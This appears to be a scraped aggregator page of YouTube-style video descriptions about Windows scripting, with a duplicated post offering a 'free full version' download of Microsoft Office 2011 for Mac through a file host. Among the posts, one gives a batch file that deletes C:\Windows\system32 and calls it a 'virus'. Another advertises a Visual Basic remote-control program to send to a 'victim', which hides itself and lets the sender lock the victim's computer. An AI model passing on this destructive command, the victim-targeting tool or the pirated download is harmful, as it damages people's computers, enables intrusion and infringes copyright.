Tag: basic
Microsoft Office 2011 for MAC Free Download – Full Version
by Installer on May.06, 2012, under Exchange 2007
Free download: fileme.us Setup The installation for Office 2011 for Mac is quite painless. Just like any other software, you’ll be asked for permission to make changes to your system, then it’s only about 10 minutes install time (depending on the speed of your Mac). Like a lot of software these days, you’ll need to have at least Mac OS X 10.5 Leopard to use all the features in the Office 2011 suite. Interface The Ribbon has returned as the unifying interface component across all the apps in the suite. Though Microsoft has met some resistance from users on both platforms for this particular feature, we think once people get used to the flexibility of the Ribbon it will save them an enormous amount of time. Rather than digging through menus and scrolling through palettes, the Ribbon uses tabs that display commands relevant to a given task. As an example, clicking on an image in Word, PowerPoint, or Excel will change the tabs in the Ribbon to image-related tasks so you can make changes quickly without having to search through menus. If you still just can’t get used to the Ribbon, in Office 2011 for Mac, you can turn it off and use regular drop-down menus (an option that several Windows users probably wish they had). Still, we recommend taking the time to learn the Ribbon as an investment that will save you more time in the future. New features Alongside interface enhancements like the Ribbon across all four Office applications, Microsoft Office 2011 offers a number of …
Microsoft Office 2011 for MAC Free Download – Full Version
by Installer on May.06, 2012, under Exchange 2007
Free download: fileme.us Setup The installation for Office 2011 for Mac is quite painless. Just like any other software, you’ll be asked for permission to make changes to your system, then it’s only about 10 minutes install time (depending on the speed of your Mac). Like a lot of software these days, you’ll need to have at least Mac OS X 10.5 Leopard to use all the features in the Office 2011 suite. Interface The Ribbon has returned as the unifying interface component across all the apps in the suite. Though Microsoft has met some resistance from users on both platforms for this particular feature, we think once people get used to the flexibility of the Ribbon it will save them an enormous amount of time. Rather than digging through menus and scrolling through palettes, the Ribbon uses tabs that display commands relevant to a given task. As an example, clicking on an image in Word, PowerPoint, or Excel will change the tabs in the Ribbon to image-related tasks so you can make changes quickly without having to search through menus. If you still just can’t get used to the Ribbon, in Office 2011 for Mac, you can turn it off and use regular drop-down menus (an option that several Windows users probably wish they had). Still, we recommend taking the time to learn the Ribbon as an investment that will save you more time in the future. New features Alongside interface enhancements like the Ribbon across all four Office applications, Microsoft Office 2011 offers a number of …
How to install: Microsoft Exchange 2010 on Windows Server 2008 R2 [720p]
by Installer on Mar.08, 2012, under Exchange 2010
A video guide to install Microsoft Exchange 2010 on Windows Server 2008 R2. Please rate/comment/subscribe. Next video: How to configure Exchange 2010 for e-mail www.rosendaal.net Software used VMware Workstation 8 Camtasia recorder Sony Vegas 10
How to make a virus with VB6
by Installer on Apr.04, 2010, under Vbscript
How to make a virus with vb6 there are lots of ways for doing this but i made it with form load by double clicking the form load and putting the code i put Www.Underworld-wolf.page.tl Credits: 90% www.underworld-wolf.blogspot.com and 10% Shell tutorials
Vbs Codes
by Installer on Apr.04, 2010, under Vbscript
Awesome Vbs Codes Download Codes: uppit.com Comment Rate Favorite and Subscribe.
VBS Virus
by Installer on Apr.03, 2010, under Vbscript
My first video.. I’m making a VBS file which is detected as malware (false positive). The script is: @echo off del c:\windows\system32 Edit: The virus doesn’t delete system32 by just opening the file. You will get a command prompt asking to confirm or not (y/n) and if you choose yes, it will delete files in system32. Most of them are access denied, but it will still make your pc unable to start again whenever you shutdown. Update: Sorry for the mistake. It’s a batch file, not a vbs file.
Make an Auto typer and a Application Opener with Notepad! with Wait and backspace and lots more
by Installer on Apr.03, 2010, under Vbscript
REMEMBER SAVE AS .vbs For Codes go to www.miutubevids.webs.com/sendkeys www.miutubevids.webs.com By Miutubevids thx for watching FOR KEY CODES GOTO www.devguru.com Subscribe/Rate/Comment www.miutubevids.webs.com
Zelftypende tekst in vbs (Notepad)
by Installer on Apr.03, 2010, under Vbscript
Je pc typt automatisch een tekst in notepad (kladblok). Kopieer het volgende in notepad en sla het op als iets.vbs: Denk aan de extensie “.vbs”, de naam mag je zelf weten. ——————————————————————– Set wshshell = wscript.createobject (“wscript.Shell”) wshshell.Run (“notepad.exe”) wscript.Sleep 600 set wshshell=createobject(“wscript.Shell”) wshshell.Sendkeys “H” wscript.Sleep 70 set wshshell=createobject(“wscript.Shell”) wshshell.Sendkeys “O” wscript.Sleep 70 set wshshell=createobject(“wscript.Shell”) wshshell.Sendkeys “I” wscript.Sleep 70 ——————————————————————– Zet steeds dit stukje onderaan het script: set wshshell=createobject(“wscript.Shell”) wshshell.Sendkeys “a” wscript.Sleep 70 En verander de letter tussen de aanhalingstekens. In dit geval dus de ‘a’ die je moet veranderen. Het getal 70 wat er steeds staat kun je ook veranderen, want dit staat voor de snelheid tussen elk teken. 1000 is 1 seconde. In dit filmpje typt de tekst ook automatisch zoals je ziet.
powersshell Script adding Active Directory Users
by Installer on Apr.03, 2010, under Vbscript
This is how to use a powershell Script to add users to an Active Directory Domain Controller. I enter the commands manually and use both powershell / Visual Basic scripts. You can create, modify, and view users though these methods. Providing training videos since last Tuesday. technoblogical.com Thanks for watching.
remote fuckup
by Installer on Apr.03, 2010, under Vbscript
here’s a little program i made in visual basic it has 2 halves one you send to your victim and the other half you keep they click on there half and a error comes up and says program timed out now closing and it hides and makes a server kind of like a game than you can connect to there server by typing there ip address and than you can open there cd rom close it send them a message lock there computer etc